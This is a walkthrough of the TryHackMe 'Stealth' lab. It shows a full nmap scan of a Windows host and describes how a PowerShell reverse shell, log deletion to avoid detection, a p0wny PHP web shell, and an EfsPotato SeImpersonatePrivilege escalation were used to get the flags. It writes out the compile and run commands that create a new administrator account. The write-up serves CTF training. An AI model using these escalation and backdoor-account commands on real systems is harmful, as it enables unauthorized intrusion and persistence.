Stealth
Link room : https://tryhackme.com/room/stealth
Writeup about Stealth room on TryHackMe
Scanning port
# Nmap 7.94SVN scan initiated Sun Dec 31 22:41:17 2023 as: nmap -T4 --min-rate 1000 -sC -sV -p- -oN report -Pn 10.10.209.208
Nmap scan report for 10.10.209.208
Host is up (0.23s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-01T03:46:25+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2023-12-31T03:37:44
|_Not valid after: 2024-07-01T03:37:44
| rdp-ntlm-info:
| Target_Name: HOSTEVASION
| NetBIOS_Domain_Name: HOSTEVASION
| NetBIOS_Computer_Name: HOSTEVASION
| DNS_Domain_Name: HostEvasion
| DNS_Computer_Name: HostEvasion
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-01T03:45:46+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: PowerShell Script Analyser
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-01T03:45:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 31 22:46:28 2023 -- 1 IP address (1 host up) scanned in 310.92 seconds
Checking web at port 8000 from description :
By Research i found this resource related to PowerShell , can get reverse shell :
Edit the IP and the port listen , setting the netcat listening we can gain the shell :
Found encodedflag file at Desktop of user evader , let try decoded that :
Move on the link from message :
It says deleting the log file might help, try looking for it around the machine :
Found the file
Upload again the reverse shell and remove the log file after that , we can get the first flag :
Let use other Ps1 file to checking vulnarable on this machine :
Upload and transfer the file to target machine :
Execute the script and checking evader's privileges :
Uploading the p0wny reverse shell file to C:\xampp\htdocs will allow you to obtain a shell via the Xampp service, as it is operated by the user evader.
Upload the file shell php to target machine :
The user has SeImpersonatePrivilege enabled this can be used as a leverage for privilege escalation
Let transfer the file to the server :
Use this command to compliing binary file :
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
EfsPotato.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add" -> Adding user to the Administrators group
After that we can access the RDP connect by Administrators and got the last flag :
Last updated